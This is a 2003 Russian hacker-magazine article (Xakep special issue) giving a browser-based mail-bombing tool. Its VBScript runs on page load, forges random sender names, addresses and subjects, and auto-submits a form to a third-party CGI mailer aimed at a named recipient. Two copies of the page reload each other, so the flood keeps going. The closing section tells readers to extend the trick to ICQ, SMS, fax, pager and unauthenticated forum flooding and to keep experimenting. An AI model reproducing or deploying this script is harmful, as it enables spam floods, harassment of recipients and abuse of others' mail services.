| Издательский дом ООО "Гейм Лэнд" | СПЕЦВЫПУСК ЖУРНАЛА ХАКЕР #33, АВГУСТ 2003 г. |
ОФИСНЫЙ СПАМ - бомбежка из броузера
Анализирующий
Спецвыпуск Xakep, номер #033, стр. 033-050-5
sub window_onload
'Формирование и отправка писем начинается сразу после открытия документа.
Randomize
'Оптимизируем генератор случайных чисел.
'Процедура формирования _имени_ отправителя :).
for x = 1 to 8
'Указывай длину ника.
symb = Int((26)*Rnd)+96
'Случайным образом определяется символ.
if symb <> 96 then
'Проверяется, является ли он буквой.
fromnik = fromnik & chr(symb)
'Если да, то он присоединяется к нику.
end if
'Конец проверки.
next
'Переход к следующему символу.
'Аналогично формируется ложный логин обратного адреса.
for x = 1 to 6
symb = Int((26)*Rnd)+96
if symb <> 96 then
maillogin=maillogin & chr(symb)
end if
next
'и ложный домен.
for x = 1 to 6
symb = Int((26)*Rnd)+96
if symb <> 96 then
maildomain=maildomain & chr(symb)
end if
next
frommail = maillogin & "@" & maildomain & ".com"
'Конструируется полный адрес отправителя.
'Формируется тема письма.
for x = 1 to 10
symb = Int((26)*Rnd)+96
if symb <> 96 then
mailsubj=mailsubj & chr(symb)
end if
next
'Используя полученные данные, генерируется заполненная форма.
Document.open
Document.write "<form action='http://www.anysite.com/cgi-bin/mailsender.cgi' name='formname' method='POST'>"
Document.write "<input type='text' name='fname' value='" & fromnik & "'><BR>"
Document.write "<input type='text' name='femail' value='" & frommail & "'><BR>"
Document.write "<input type='text' name='toemail' value='billgates@microsoft.com'><BR>"
Document.write "<input type='text' name='subject' value='" & mailsubj & "'><BR>"
Document.write "<textarea rows=8 cols=34 name='body' maxlength=1000>Hi</textarea><BR>"
Document.write "<input type='submit' value='Отправить'> "
Document.write "<input type='reset' value='Очистить'>"
Document.write "<input type='hidden' name='lng' value='ru'>"
Document.write "<input type='hidden' name='v' value='post'>"
Document.write "</form>"
Document.close
document.formname.submit
mailsubj=""
frommail=""
'Обнуляем использованные переменные.
'После чего она отправляется.
window.location="send1.html"
'Для обновления параметров загружаем второй документ.
end sub
--></SCRIPT>
</BODY>
</HTML>
Теперь копируй этот файл с именем send1.htm и заменяй строку кода
window.location="send1.html"
на
window.location="send.html".
В итоге, после запуска одного из них из первого документа будет вызываться второй, а из второго - первый. Получается кольцевая схема. Флуд будет продолжаться до тех пор, пока ты не умудришься закрыть окно браузера. А это не так-то просто (поверь мне ;)) как с моральной, так и с физической стороны.
РАСШИРЬ КРУГОЗОР
Данный способ пригоден для флуда не только электронной почты, но и ICQ, SMS, факсов, пейджеров и, при некотором ухищрении, - форумов, если там нет авторизации. Достаточно лишь найти соответствующие сервисы, задав в поисковой машине комбинации "+send +free +sms", "+send +free +fax" и т.д.
Не бойся экспериментировать. Если не получилось, попробуй добавить что-либо из оригинального документа. Все зависит от конкретного сайта.